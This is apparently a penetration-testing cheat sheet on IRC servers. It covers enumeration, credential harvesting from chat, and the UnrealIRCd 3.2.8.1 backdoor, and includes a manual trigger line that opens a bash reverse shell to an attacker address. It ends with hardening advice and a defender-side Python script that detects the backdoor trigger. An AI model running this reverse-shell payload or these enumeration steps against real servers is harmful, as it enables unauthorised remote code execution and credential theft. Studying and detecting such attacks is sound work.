IRC
aka ircd, unrealircd
Internet Relay Chat on 6667 (and 194/6697). Enumerate channels and users, harvest creds from chat, and watch for the famous UnrealIRCd 3.2.8.1 backdoor that gives instant RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
| 6667 | tcp | IRC |
| 6697 | tcp | IRC over TLS |
| 194 | tcp | IRC (registered) |
Fingerprint
- Banner / MOTD names the ircd and version on connect
- nmap irc-info script returns server stats
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2010-2075 | UnrealIRCd 3.2.8.1 backdoor — unauthenticated RCE |
Exploitation primitives
- Connect and enumerate channels (LIST) and users (WHO) for creds/info
- UnrealIRCd 3.2.8.1 backdoor: send `AB; <cmd>` for RCE (Metasploit unreal_ircd_3281_backdoor)
- Weak/guessable OPER credentials grant server operator control
Overview
IRC on 6667 is a chat server. Two angles: enumerate channels/users (chat leaks creds), and version-check the daemon — UnrealIRCd 3.2.8.1 shipped with a literal backdoor.
Enumeration
Banner / version:
nc -nv <TARGET> 6667
nmap info:
nmap -p6667 --script irc-info,irc-unrealircd-backdoor <TARGET>
Connect with a client to LIST channels / WHO users:
irssi -c <TARGET> -p 6667
UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075)
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
Manual trigger:
printf 'AB; bash -c "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"\n' | nc <TARGET> 6667
Hardening
Patch UnrealIRCd, require strong OPER passwords, and restrict server linking.
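Defender-side check, added here as an example (not part of the original cheat sheet or of UnrealIRCd): read the version from a captured greeting, compare it with the release named above, and flag inbound lines that carry the `AB;` trigger prefix. The sample lines, host names and function names are constructed for illustration.

```python
import re

# Constructed sample: server greeting as a client sees it on connect.
SAMPLE_GREETING = [
    ":irc.example.test NOTICE AUTH :*** Looking up your hostname...",
    ":irc.example.test 001 audit :Welcome to the ExampleNet IRC Network",
    ":irc.example.test 002 audit :Your host is irc.example.test, "
    "running version Unreal3.2.8.1",
    ":irc.example.test 004 audit irc.example.test Unreal3.2.8.1 "
    "iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj",
]

# Constructed sample: (source address, raw line) pairs received by the server.
SAMPLE_INBOUND = [
    ("10.0.0.5", "NICK audit"),
    ("10.0.0.5", "USER audit 0 * :audit"),
    ("203.0.113.9", "AB; id"),
    ("10.0.0.7", "LIST"),
]

AFFECTED = "Unreal3.2.8.1"  # release this page ties to CVE-2010-2075
TRIGGER = "AB;"             # trigger prefix as given on this page


def server_version(greeting):
    """Return the ircd version from numeric 004 (RPL_MYINFO), else from 002."""
    fallback = None
    for line in greeting:
        parts = line.split()
        if len(parts) >= 5 and parts[1] == "004":
            return parts[4]  # :server 004 nick servername version ...
        match = re.search(r"running version (\S+)", line)
        if len(parts) >= 2 and parts[1] == "002" and match:
            fallback = match.group(1)
    return fallback


def is_affected_version(version):
    """Version match only: a hit means the build needs verifying or replacing."""
    return version is not None and version.lower() == AFFECTED.lower()


def backdoor_attempts(inbound):
    """Return inbound (source, line) pairs that start with the trigger prefix.

    An IRC command token is letters or a three-digit numeric, so a line
    beginning with 'AB;' is not valid client traffic.
    """
    return [(src, line) for src, line in inbound if line.startswith(TRIGGER)]
```

Feed `backdoor_attempts` from whatever raw-line source is available (IDS payload log, proxy capture); it works on cleartext 6667 traffic only, not on TLS sessions to 6697.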